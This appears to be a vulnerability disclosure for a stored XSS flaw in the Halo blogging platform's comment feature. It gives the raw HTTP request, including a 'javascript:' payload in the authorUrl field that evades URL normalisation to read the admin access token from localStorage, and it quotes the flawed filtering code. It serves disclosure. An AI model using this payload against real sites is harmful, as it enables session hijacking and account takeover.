Storage XSS vulnerabilities in article reviews

Created by: thiscodecc

Enter at the Write Comments

Screenshots :

After the request is successful.

View in the background. For the comment list, click jack01.

XSS vulnerability will be launched.

Hackers can steal localStorage ,Authentication of privileges is halo__Access-Token

Payload

POST /api/content/posts/comments HTTP/1.1 Host: 127.0.0.1:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 147 Connection: close

{"author":"jack02","authorUrl":"javascript:alert(localStorage.getItem('halo__Access-Token'));//://","email":"1@2.com","content":"hello","postId":1}

The reason for the vulnerability is an error in authorURL parameter filtering

BaseCommentServiceImpl:

  if (StringUtils.isNotEmpty(comment.getAuthorUrl())) {
            comment.setAuthorUrl(URLUtil.normalize(comment.getAuthorUrl()));
        }

public static String normalize(String url, boolean isEncodeBody) {
		if (StrUtil.isBlank(url)) {
			return url;
		}
		final int sepIndex = url.indexOf("://");
		String pre;
		String body;
		if (sepIndex > 0) {
			pre = StrUtil.subPre(url, sepIndex + 3);
			body = StrUtil.subSuf(url, sepIndex + 3);
		} else {
			pre = "http://";
			body = url;
		}

		final int paramsSepIndex = StrUtil.indexOf(body, '?');
		String params = null;
		if (paramsSepIndex > 0) {
			params = StrUtil.subSuf(body, paramsSepIndex);
			body = StrUtil.subPre(body, paramsSepIndex);
		}


		body = body.replaceAll("^[\\/]+", StrUtil.EMPTY);

		body = body.replace("\\", "/").replaceAll("//+", "/");
		if (isEncodeBody) {
			body = encode(body);
		}
		return pre + body + StrUtil.nullToEmpty(params);
	}

Ask the author to fix this vulnerability.Thanks